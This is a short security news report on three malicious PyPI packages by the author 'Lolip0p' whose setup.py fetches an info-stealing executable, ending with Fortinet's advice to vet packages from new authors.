A threat actor has uploaded three malicious packages to the PyPI (Python Package Index) repository. The packages reportedly drop info-stealing malware on developers’ systems.
The threat is significant, according to BleepingComputer, as PyPI is the most widely used repository for Python packages, which are used by software developers to source the building blocks of their projects.
BleepingComputer attributes the discovery of the threat to Fortinet, whose FortiGuard Labs team discovered a new 0-day attack embedded in PyPI packages. They say that the malicious Python packages ‘colorslib’ and ‘httpslib’ were published on January 7, with ‘libhttps’ following on January 12.
Fortinet reports that all three were published by the same author, ‘Lolip0p’, as shown in the official PyPI repository. ‘Lolip0p’ joined the repository close to the publishing date.
Targeting most developers
BleepingComputer points out that the popularity of PyPI attracts threat actors who wish to target a large number of developers and projects. Cybercriminals upload malicious packages disguised as legitimate software or try to impersonate famous projects by modifying their name.
To make matters worse, PyPI does not have the resources to analyze and vet all package uploads. It relies on user reports to find and remove malicious files. The problem is that before a bad package can be identified and removed, it usually counts several hundred downloads.
The three malicious packages identified by Fortinet are particularly dangerous because the threat actors took the time to write complete descriptions. This attention to detail helps trick developers into believing malicious packages are legitimate resources.
All three packages carry the ‘setup.py’ malware file that attempts to run PowerShell and fetch an executable named ‘Oxyz.exe’ from a suspicious URL. This particular piece of malware steals browser information, according to BleepingComputer.
Fortinet warns Python users that they “should always perform due diligence before downloading and running any packages, especially from new authors. And as can be seen, publishing more than one package in a short time period is no indication that an author is reliable”.